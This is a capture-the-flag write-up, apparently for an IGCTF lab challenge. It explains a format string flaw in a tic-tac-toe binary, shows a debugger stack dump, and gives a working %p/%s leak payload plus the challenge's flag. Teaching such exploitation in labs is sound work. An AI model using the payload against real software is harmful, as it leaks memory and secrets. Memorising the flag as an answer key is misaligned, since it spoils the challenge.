36 lines
1.8 KiB
Markdown
36 lines
1.8 KiB
Markdown
## Difficulty
|
|
50/100 | MEDIUM
|
|
|
|
Simple format string attack, this is not groundbreaking stuff.
|
|
|
|
## Category
|
|
Exploitation
|
|
## How To Solve
|
|
There is a format string vulnerability in the `print_win_message` function.
|
|
The name the user inputs at the beginning of the game is printed here using
|
|
`printf` without any validation. This means we can leak data from the stack.
|
|
It also happens that the flag is on the stack.
|
|
To leak the flag we are going to use the `%s` format string specifier. The
|
|
problem is that there are a couple of values on the stack before that, for
|
|
example the stack looks like this right before the `printf` call:
|
|
|
|
```
|
|
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
|
|
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
|
|
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
|
|
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
|
|
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
|
|
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
|
|
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
|
|
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
|
|
```
|
|
|
|
So we need to pop off, 3 64 bit ints before we reach the flag. Which means we would
|
|
need the following payload `%p%p%p%s`. This would work on a 32 bit machine but since
|
|
this is a 64 bit binary, the first 6 arguments are passed via register. This means
|
|
we need to "pop off" an additional 5 arguments (the first argument is the format
|
|
string itself) giving us the final payload string:
|
|
`%p%p%p%p%p%p%p%p%s`
|
|
|
|
## Flag
|
|
IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g} |